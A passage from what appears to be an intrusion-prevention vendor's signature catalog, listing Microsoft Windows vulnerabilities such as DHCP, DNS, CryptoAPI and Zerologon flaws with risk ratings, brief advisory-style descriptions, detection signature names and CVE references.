https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-44666

Microsoft-Windows-Credssp-MITM-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1059-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There has been reported a remote code execution vulnerability in Microsoft Windows. Successful exploitation of this man-in-the-middle vulnerability could lead to arbitrary code execution in the target machine.

Situation:

Generic_SS-Microsoft-Windows-Credssp-MITM-Code-Execution

References:

CVE-2018-0886
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0886

Microsoft-Windows-CryptoAPI-Spoofing-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1216-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There has been reported a spoofing vulnerability in Microsoft Windows. Successful exploitation could trick users to trust the content of website. This situation might generate false-positives in very rare cases. We haven't seen any false-positives to occur in our telemetry.

Situation:

TLS_SS-Microsoft-Windows-CryptoAPI-Spoofing-Vulnerability

References:

CVE-2020-0601
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-0601

Microsoft-Windows-CryptoAPI-X.509-Object-Identifiers-Spoofing-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows CryptoAPI

Risk:

High

First detected in:

sgpkg-ips-578-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Microsoft CryptoAPI

Type:

Malfunction

Description:

The CryptoAPI component in Microsoft Windows 2000 SP4, Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista Gold, SP1, and SP2, Windows Server 2008 Gold, SP2, and R2, and Windows 7, as used by Internet Explorer and other applications, does not properly handle a '\0' character in a domain name in the subject's Common Name (CN) field of an X.509 certificate, which allows man-in-the-middle attackers to spoof arbitrary SSL servers via a crafted certificate issued by a legitimate Certification Authority, aka "Null Truncation in X.509 Common Name Vulnerability," a related issue to CVE-2009-2408.

Situation:

HTTPS_SS-TLS-Certificate-Common-Name-Null-Byte-Input-Validation-Error

References:

CVE-2009-2510
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2510

BID-36475
http://www.securityfocus.com/bid/36475

MS09-056
http://technet.microsoft.com/security/bulletin/MS09-056

Microsoft-Windows-CVE-2012-0013-Insecure-ClickOnce-Application

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-707-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists vulnerability in Microsoft Windows. A remote attacker can use this to create a malicious Microsoft Office document containing a crafted ClickOnce application, which can lead to arbitrary code execution in the affected machine.

Situation:

File-OLE_Microsoft-Windows-CVE-2012-0013-Insecure-ClickOnce-Application

References:

CVE-2012-0013
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0013

BID-51824
http://www.securityfocus.com/bid/51824

OSVDB-78207
http://www.osvdb.org/78207

MS12-005
http://technet.microsoft.com/security/bulletin/MS12-005

Microsoft-Windows-Devicemetadata-Path-Traversal

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1130-5242

Last changed:

sgpkg-ips-1476-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A path traversal vulnerability has been reported in Microsoft Windows. Successful exploitation can lead to remote code execution.

Situation:

File-Binary_Microsoft-Windows-Devicemetadata-Path-Traversal

References:

ms19-jan
http://technet.microsoft.com/security/bulletin/ms19-jan

Microsoft-Windows-DFS-Memory-Corruption-CVE-2011-1868

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-398-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows 2003

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Windows.

Situation:

SMB-TCP_Microsoft-Windows-DFS-Memory-Corruption-CVE-2011-1868

References:

CVE-2011-1868
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1868

BID-48180
http://www.securityfocus.com/bid/48180

MS11-042
http://technet.microsoft.com/security/bulletin/MS11-042

Microsoft-Windows-DHCP-Client-CVE-2019-0547-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1127-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There has been reported a code execution vulnerability in Microsoft DHCP Client. This vulnerability could be exploited by sending maliciously crafted DHCP responses to Windows system. Successful exploitation could allow arbitrary code execution on the target system.

Situation:

BOOTP_SS-Microsoft-Windows-DHCP-Client-CVE-2019-0547-Code-Execution

References:

CVE-2019-0547
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0547

Microsoft-Windows-DHCP-Client-Dhcpextractfulloptions-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1150-5242

Last changed:

sgpkg-ips-1866-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

There has been reported a code execution vulnerability in Microsoft DHCP Client. A remote attacker is required to send malicious DHCP responses to vulnerable Windows system to exploit this vulnerability. Successful exploitation might lead in arbitrary code execution.

Situation:

BOOTP_CS-Microsoft-Windows-DHCP-Client-Dhcpextractfulloptions-Code-Execution
BOOTP_SS-Microsoft-Windows-DHCP-Client-Dhcpextractfulloptions-Code-Execution

References:

CVE-2019-0697
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0697

Microsoft-Windows-DHCP-Client-Out-Of-Bounds-Read-CVE-2025-21179

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1848-5242

Last changed:

sgpkg-ips-1848-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An out-of-bounds read vulnerability has been reported in Microsoft DHCP Client. The vulnerability is due to improper processing of DHCP messages, causing memory corruption. A remote attacker could exploit this vulnerability by sending maliciously crafted DHCP responses to a vulnerable Windows system. Successful exploitation could result in a denial of service condition.

Situation:

BOOTP_CS-Microsoft-Windows-DHCP-Client-Out-Of-Bounds-Read-CVE-2025-21179

References:

CVE-2025-21179
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21179

ms25-feb
http://technet.microsoft.com/security/bulletin/ms25-feb

Microsoft-Windows-DHCP-Client-Service-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-140-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows 2003

Software:

<os>

Type:

Buffer Overflow

Description:

There is a buffer overflow vulnerability in the DHCP client component of Microsoft Windows. The flaw is caused by the improper processing of crafted DHCP response messages. A remote attacker may leverage this vulnerability by sending a crafted DHCP response to the affected service, resulting in the possible injection and execution of arbitrary code on the target system. Any injected code would be executed within the security context of the System user.

Situation:

Generic_UDP-Microsoft-Windows-DHCP-Client-Service-Buffer-Overflow
BOOTP_CS-Microsoft-Windows-DHCP-Client-Service-Buffer-Overflow
BOOTP_SS-Microsoft-Windows-DHCP-Client-Service-Buffer-Overflow

References:

CVE-2006-2372
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2372

BID-18923
http://www.securityfocus.com/bid/18923

OSVDB-27151
http://www.osvdb.org/27151

MS06-036
http://technet.microsoft.com/security/bulletin/MS06-036

Microsoft-Windows-DHCP-Server-Code-Execution-CVE-2019-0626

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1137-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A code execution vulnerability has been reported in Microsoft DHCP Server. The vulnerability is due to improper processing of DHCP messages, causing memory corruption. A remote attacker could exploit this vulnerability by sending maliciously crafted DHCP requests to a vulnerable Windows DHCP server. Successful exploitation of this vulnerability could allow the attacker to execute arbitrary code with the privileges of network service.

Situation:

BOOTP_CS-Microsoft-Windows-DHCP-Server-Code-Execution-CVE-2019-0626

References:

CVE-2019-0626
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0626

Microsoft-Windows-DHCP-Server-Failover-CVE-2023-38162-Denial-Of-Service

About this vulnerability:

A vulnerability in Microsoft Windows Server

Risk:

High

First detected in:

sgpkg-ips-1635-5242

Last changed:

sgpkg-ips-1635-5242

Platform:

Windows

Software:

Windows Server

Type:

Malfunction

Description:

A denial of service vulnerability has been reported in the DHCP Server component of Microsoft Windows. The vulnerability is due to improper handling of DHCP failover packets leading to memory corruption. A remote attacker can exploit this vulnerability by sending crafted DHCP failover packets to the target server. Successful exploitation could result in the server abnormally terminating, resulting in a denial-of-service condition.

Situation:

Generic_SS-Microsoft-Windows-DHCP-Server-Failover-CVE-2023-38162-Denial-Of-Service
Generic_CS-Microsoft-Windows-DHCP-Server-Failover-CVE-2023-38162-Denial-Of-Service

References:

CVE-2023-38162
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38162

ms23-sep
http://technet.microsoft.com/security/bulletin/ms23-sep

Microsoft-Windows-DHCP-Server-Failover-DoS

About this vulnerability:

A vulnerability in Microsoft Windows Server.

Risk:

High

First detected in:

sgpkg-ips-1371-5242

Last changed:

sgpkg-ips-1371-5242

Platform:

Windows

Software:

Windows Server

Type:

Malfunction

Description:

A vulnerability in the DHCP Server component of Microsoft Windows which allows remote attackers to cause a denial of service condition by sending specially crafted DHCP failover packets to a target server, due to the improper handling of the packets which leads to memory coruption.

Situation:

Generic_CS-Microsoft-Windows-DHCP-Server-Failover-DoS

References:

CVE-2019-1206
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1206

Microsoft-Windows-DHCP-Server-Failover-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows Server

Risk:

High

First detected in:

sgpkg-ips-1241-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A remote code execution vulnerability has been reported in the DHCP Server component of Microsoft Windows. The vulnerability is due to improper handling of DHCP failover packets leading to memory corruption. A remote attacker can exploit this vulnerability by sending crafted DHCP failover packets to the target server. Successful exploitation could result in the execution of arbitrary code with administrative privileges.

Situation:

Generic_CS-Microsoft-Windows-DHCP-Server-Failover-Remote-Code-Execution

References:

CVE-2019-0785
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0785

ms19-jul
http://technet.microsoft.com/security/bulletin/ms19-jul

Microsoft-Windows-DHCP-Server-Remote-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows Server

Risk:

High

First detected in:

sgpkg-ips-1243-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Windows Server

Type:

Race Condition

Description:

A remote code execution vulnerability has been reported in the DHCP Server component of Microsoft Windows. The vulnerability is due to improper handling of DHCP packets. A remote attacker on the local network can exploit this vulnerability by sending crafted DHCP packets to the target server. Successful exploitation could result in the execution of arbitrary code with administrative privileges.

Situation:

BOOTP_CS-Microsoft-Windows-DHCP-Server-Remote-Code-Execution

References:

CVE-2019-0725
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0725

ms19-may
http://technet.microsoft.com/security/bulletin/ms19-may

Microsoft-Windows-DHCP-Server-UncodeOption-Heap-Buffer-Overflow-CVE-2019-0626

About this vulnerability:

A vulnerability in Microsoft Windows DHCP Server

Risk:

High

First detected in:

sgpkg-ips-1150-5242

Last changed:

sgpkg-ips-1866-5242

Platform:

Windows

Software:

Generic dhcp server

Type:

Buffer Overflow

Description:

A heap buffer overflow vulnerability in Microsoft DHCP Server which allows remote attackers to execute arbitrary code by send a malicious DHCP request to a vulnerable server.

Situation:

BOOTP_CS-Microsoft-Windows-DHCP-Server-UncodeOption-Heap-Buffer-Overflow-CVE-2019-0626

References:

CVE-2019-0626
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0626

Microsoft-Windows-Dhcpv6-Client-Parsedhcpv6options-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1150-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

Improper processing of DHCPv6 messages causes memory corruption in Windows. A successful attack may allow code execution with system privileges.

Situation:

Generic_UDP-Microsoft-Windows-Dhcpv6-Client-Parsedhcpv6options-Code-Execution

References:

CVE-2019-0698
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0698

Microsoft-Windows-DirectShow-Insecure-Library-Loading-CVE-2011-0032

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-380-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows Vista; Windows 7; Windows 2008 R2

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Windows.

Situation:

HTTP_CSU-Microsoft-Windows-DirectShow-Insecure-Library-Loading-CVE-2011-0032
SMB-TCP_CHS-Microsoft-Windows-DirectShow-Insecure-Library-Loading-CVE-2011-0032

References:

CVE-2011-0032
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0032

BID-46682
http://www.securityfocus.com/bid/46682

OSVDB-71015
http://www.osvdb.org/71015

MS11-015
http://technet.microsoft.com/security/bulletin/MS11-015

Microsoft-Windows-DirectShow-JPEG-Double-Free

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-570-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A double free vulnerability has been reported in Microsoft Windows DirectShow. The vulnerability is due to the way DirectShow handles JPEG images. A remote attacker can exploit this vulnerability by enticing a user to download and process a maliciously crafted JPEG file. This can lead to code execution in the context of the affected user.

Situation:

File-JPEG_Microsoft-Windows-DirectShow-JPEG-Double-Free

References:

CVE-2014-0301
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0301

BID-66045
http://www.securityfocus.com/bid/66045

OSVDB-104316
http://www.osvdb.org/104316

MS14-013
http://technet.microsoft.com/security/bulletin/MS14-013

Microsoft-Windows-DirectX-Information-Disclosure-CVE-2018-8563

About this vulnerability:

A vulnerability in Microsoft Graphics Component

Risk:

High

First detected in:

sgpkg-ips-1115-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

Internet Explorer 11.0

Type:

Malfunction

Description:

There exists an information disclosure vulnerability in the Microsoft Graphics Component. A remote attacker can use this to execute arbitrary code on the affected system.

Situation:

File-Text_Microsoft-Windows-DirectX-Information-Disclosure-CVE-2018-8563

References:

CVE-2018-8563
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8563

ms18-nov
http://technet.microsoft.com/security/bulletin/ms18-nov

Microsoft-Windows-DLL-Hijack-Vulnerability

About this vulnerability:	DLL hijack vulnerability in Microsoft Windows.
Risk:	High
First detected in:	sgpkg-ips-334-4219
Last changed:	sgpkg-ips-1620-5242
Platform:	Windows
Software:	<os>
Type:	Input Validation
Description:	Various Windows applications suffer from a vulnerability in the way that DLL files are loaded. If a vulnerable application opens a file from a directory controlled by the attacker, the application will try to load DLL files from the same directory. This allows attackers to execute arbitrary code in vulnerable application.
Situation:	HTTP_CS-Microsoft-Windows-DLL-Hijack-Vulnerability HTTP_CSH-Microsoft-Windows-DLL-Hijack-Vulnerability

Microsoft-Windows-DNS-Client-Buffer-Overrun

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-415-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

There exists a buffer overflow vulnerability in the DNS client component of Microsoft Windows. The flaw is caused by the improper processing of crafted DNS messages. A remote attacker may leverage this vulnerability by sending crafted DNS responses to the affected service, resulting in the possible injection and execution of arbitrary code on the target system. Any injected code would be executed within the security context of the System user. In an attack case where code injection is not successful, the affected service will terminate abnormally. As the service is integral to the function of the operating system, the operating system will be shutdown. It is likely that the system will continue this behaviour after restarting, since it will attempt to use the DNS service to locate certain servers upon startup. In a more sophisticated attack where code injection results is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the SYSTEM account.

Situation:

DNS-TCP_Microsoft-Windows-DNS-Client-Buffer-Overrun
DNS-UDP_Microsoft-Windows-DNS-Client-Buffer-Overrun-2

References:

CVE-2006-3441
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3441

BID-19404
http://www.securityfocus.com/bid/19404

OSVDB-27844
http://www.osvdb.org/27844

MS06-041
http://technet.microsoft.com/security/bulletin/MS06-041

Microsoft-Windows-DNS-Client-Service-CVE-2011-0657

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-387-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows Vista; Windows 2003; Windows 2008; Windows 7; Windows 2008 R2

Software:

<os>

Type:

Malfunction

Description:

There is a vulnerability in Microsoft Windows.

Situation:

Generic_UDP-Microsoft-Windows-DNS-Client-Service-CVE-2011-0657
DNS-UDP_Microsoft-Windows-DNS-Client-Service-CVE-2011-0657

References:

CVE-2011-0657
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0657

BID-47242
http://www.securityfocus.com/bid/47242

OSVDB-71780
http://www.osvdb.org/71780

MS11-030
http://technet.microsoft.com/security/bulletin/MS11-030

Microsoft-Windows-DNS-Insufficient-Socket-Entropy-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There is a DNS Cache Poisoning vulnerability in Microsoft DNS servers and clients. The vulnerability is due to insufficient transaction ID entropy in outgoing DNS queries. A remote attacker can exploit this vulnerability to poison the DNS cache by sending malicious responses to DNS requests, thereby redirecting Internet traffic to illegitimate sites. In a successful attack case, the attacker can manipulate cache data, potentially facilitating man-in-the-middle, site-impersonation, or denial-of-service attacks.

Situation:

DNS-UDP_Microsoft-Windows-DNS-Insufficient-Socket-Entropy-Vulnerability

References:

CVE-2008-1447
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447

BID-30131
http://www.securityfocus.com/bid/30131

MS08-037
http://technet.microsoft.com/security/bulletin/MS08-037

Microsoft-Windows-DNS-Server-Remote-Code-Execution-CVE-2020-1350

About this vulnerability:

Remote code execution in Microsoft Windows Domain Name System Server services

Risk:

High

First detected in:

sgpkg-ips-1264-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

Parsing malicious DNS messages can trigger an integer overflow in Microsoft Windows DNS Server's buffer allocations, which may lead to remote code execution in the context of the local system process.

Situation:

DNS-TCP_Windows-Server-Remote-Code-Execution-Malicious-Request-CVE-2020-1350
DNS-TCP_Windows-Server-Remote-Code-Execution-Malicious-Response-CVE-2020-1350

References:

CVE-2020-1350
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1350

Microsoft-Windows-DNS-Server-RPC-Management-Interface-Buffer-Overflow

About this vulnerability:

Buffer overflow vulnerability in Microsoft Windows Domain Name System Server services

Risk:

High

First detected in:

sgpkg-ips-103-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000 Server; Windows 2000 Advanced Server; Windows 2000 Datacenter Server; Windows 2003

Software:

<os>

Type:

Buffer Overflow

Description:

There is a stack-based buffer overflow vulnerability in Microsoft Windows Domain Name System Server services. A crafed RPC call with a malicious string as the zone name parameter allows arbitrary code execution with the privileges of the affected service process.

Situation:

MSRPC-TCP_CPS-Microsoft-Windows-DNS-Server-RPC-Management-Interface-BOF
Generic_Microsoft-Windows-DNS-Server-RPC-Management-Interface-Buffer-Overflow

References:

CVE-2007-1748
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1748

BID-23470
http://www.securityfocus.com/bid/23470

MS07-029
http://technet.microsoft.com/security/bulletin/MS07-029

Microsoft-Windows-DNS-Server-Spoofing-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-436-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a DNS Cache Poisoning vulnerability in Microsoft DNS servers. The vulnerability is due to predictable transaction ID values in outgoing DNS queries. A remote attacker can exploit this vulnerability to poison the DNS cache by sending malicious responses to DNS requests, thereby redirecting Internet traffic to illegitimate sites. In a successful attack case, the attacker can manipulate cache data, potentially facilitating man-in-the-middle, site-impersonation, or denial-of-service attacks.

Situation:

Generic_UDP-Microsoft-Windows-DNS-Server-Spoofing-Vulnerability
Generic_UDP-Microsoft-Windows-DNS-Spoofing-Vulnerability
DNS-UDP_Microsoft-Windows-DNS-Server-Spoofing-Vulnerability-2
DNS-UDP_Microsoft-Windows-DNS-Server-Spoofing-Vulnerability

References:

CVE-2007-3898
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3898

BID-25919
http://www.securityfocus.com/bid/25919

MS07-062
http://technet.microsoft.com/security/bulletin/MS07-062

Microsoft-Windows-Dnsapi-NSEC3-Heap-Based-Buffer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1005-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

Insuddicient validation of NSEC3 records in DNS responses causes a heap-based buffer overflow in Windows. A successful exploit allows arbitrary code execution.

Situation:

DNS-UDP_Microsoft-Windows-Dnsapi-NSEC3-Heap-Based-Buffer-Overflow

References:

CVE-2017-11779
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11779

Microsoft-Windows-Domain-Controller-Zerologon-CVE-2020-1472

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-1276-5242

Last changed:

sgpkg-ips-1545-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

An attempt to exploit a Windows Domain Controller.

Situation:

SMB-TCP_Microsoft-Windows-Domain-Controller-Zerologon-CVE-2020-1472
MSRPC-TCP_CPS-Microsoft-Windows-Domain-Controller-Zerologon-CVE-2020-1472

References:

CVE-2020-1472
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-1472

Microsoft-Windows-Domain-User-Code-Execution

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-809-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

There exists a code execution vulnerability in Microsoft Windows.

Situation:

LDAP_CS-Microsoft-Windows-Domain-User-Code-Execution

References:

CVE-2016-3368
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-3368

Microsoft-Windows-DVR-MS-CVE-2011-0042

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

High

First detected in:

sgpkg-ips-380-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows XP; Windows Vista; Windows 7; Windows 2008 R2

Software:

<os>

Type:

Input Validation

Description:

There is a vulnerability in Microsoft Windows.

Situation:

HTTP_SS-Microsoft-Windows-DVR-MS-CVE-2011-0042
SMB-TCP_Microsoft-Windows-DVR-MS-CVE-2011-0042
File-Binary_Microsoft-Windows-DVR-MS-CVE-2011-0042

References:

CVE-2011-0042
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0042

BID-46680
http://www.securityfocus.com/bid/46680

OSVDB-71016
http://www.osvdb.org/71016

MS11-015
http://technet.microsoft.com/security/bulletin/MS11-015

Microsoft-Windows-Els.dll-Insecure-Library-Loading

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-715-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 7; Windows 8; Windows 8.1; Windows RT; Windows RT 8.1; Windows 2008; Windows 2012

Software:

<os>

Type:

Input Validation

Description:

An insecure library loading vulnerability exists in Microsoft Windows esl.dll. The vulnerability is due to the way that the affected component handles the loading of dynamic link library (.DLL) files. A remote attacker could exploit this vulnerability by enticing a target user to open an Office file from an SMB or WebDAV share. Successful exploitation could result in arbitrary code execution in the security context on the target user.

Situation:

File-OLE_Microsoft-Windows-Els.dll-Insecure-Library-Loading
File-RTF_Microsoft-Windows-Els.dll-Insecure-Library-Loading
File-TextId_Microsoft-Windows-Els.dll-Insecure-Library-Loading

References:

CVE-2015-6128
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6128

MS15-132
http://technet.microsoft.com/security/bulletin/MS15-132

Microsoft-Windows-Embedded-OpenType-Font-Engine-Lzcomp-Integer-Overflow

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-410-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Buffer Overflow

Description:

An integer overflow vulnerability has been reported in Microsoft Windows Embedded OpenType (EOT) Font Engine. The vulnerability is due to insufficient validation of an integer value while processing an EOT font compressed using the LZCOMP method. Remote attackers can exploit this vulnerability by enticing target users to view a maliciously crafted font in an application that utilizes the affected font engine, such as Internet Explorer and Microsoft Office products. Successful exploitation of this vulnerability would result in arbitrary code execution with the privileges of the logged in user. In case of an unsuccessful attack, the application using the affected font engine would terminate abnormally.

Situation:

File-Binary_MS-Windows-Embedded-OpenType-Font-Engine-Lzcomp-IOF

References:

CVE-2010-0018
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0018

BID-37671
http://www.securityfocus.com/bid/37671

OSVDB-61651
http://www.osvdb.org/61651

MS10-001
http://technet.microsoft.com/security/bulletin/MS10-001

Microsoft-Windows-EOT-Font-Engine-Information-Disclosure-Vulnerability

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1044-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

Improper file handling by the Windows EOT font engine causes an information disclosure vulnerability in Windows. A successful exploit may allow an attacker to gain information for further access to the system.

Situation:

File-Binary_Microsoft-Windows-EOT-Font-Engine-Information-Disclosure-Vulnerability

References:

CVE-2018-0855
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0855

Microsoft-Windows-EOT-Font-Engine-Information-Disclosure-Vulnerability-2

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1049-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Malfunction

Description:

A vulnerability in Windows.

Situation:

File-Binary_Microsoft-Windows-EOT-Font-Engine-Information-Disclosure-CVE-2018-0761

References:

CVE-2018-0761
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0761

Microsoft-Windows-Event-Viewer-Information-Disclosure

About this vulnerability:

A vulnerability in Microsoft Windows

Risk:

Moderate

First detected in:

sgpkg-ips-1176-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

Input Validation

Description:

An information disclosure vulnerability has been reported in the Windows Event Viewer.

Situation:

File-TextId_Microsoft-Windows-Event-Viewer-Information-Disclosure

References:

CVE-2019-0948
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0948

Microsoft-Windows-Exchange-System-Attendant-Denial-Of-Service

About this vulnerability:

Denial of Service vulnerability in Microsoft Exchange

Risk:

Moderate

First detected in:

sgpkg-ips-396-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows 2000; Windows XP; Windows 2003; Windows 2008

Software:

Exchange Server 2000; Exchange Server 2003

Type:

Malfunction

Description:

A denial of service vulnerability exists in the Microsoft Exchange System Attendant. The vulnerability is a result of insufficient validation when processing crafted parameters supplied to the System Attendant service. Successful exploitation of this vulnerability can allow a remote unauthenticated attacker to terminate the affected service, causing a denial of service condition. Upon triggering this vulnerability, the System Attendant service on the target server will terminate abnormally. Users may experience interruption and temporary unavailability of all services hosted by the affected process such as: address list maintenance, enforcement of message retention policies, resource monitoring, and others. To restore functionality, the affected service needs to be manually restarted.

Situation:

Generic_Microsoft-Windows-Exchange-Denial-Of-Service

References:

CVE-2009-0099
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0099

OSVDB-51838
http://www.osvdb.org/51838

MS09-003
http://technet.microsoft.com/security/bulletin/MS09-003

Microsoft-Windows-Explorer-CFileSysEnum-Directory-Traversal

About this vulnerability:

A vulnerability in Microsoft Windows File Explorer

Risk:

High

First detected in:

sgpkg-ips-1834-5242

Last changed:

sgpkg-ips-1834-5242

Platform:

Windows

Software:

Microsoft Windows Explorer

Type:

Directory Traversal

Description:

A vulnerability in Microsoft Windows Explorer, in multiple versions of Microsoft Windows, which allows a remote attacker to gain sensitive information or perform arbitrary file deletion by enticing a victim into performing a file management operation on a file with a crafted name.

Situation:

SMB-TCP_SS-Microsoft-Windows-Explorer-CFileSysEnum-Directory-Traversal

References:

CVE-2024-49082
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-49082

Microsoft-Windows-Explorer-Invalid-Url-File-Parsing-Stack-Overflow

About this vulnerability:

Denial of service vulnerability in Microsoft Windows Explorer

Risk:

Moderate

First detected in:

sgpkg-ips-72-1314

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

<os>

Type:

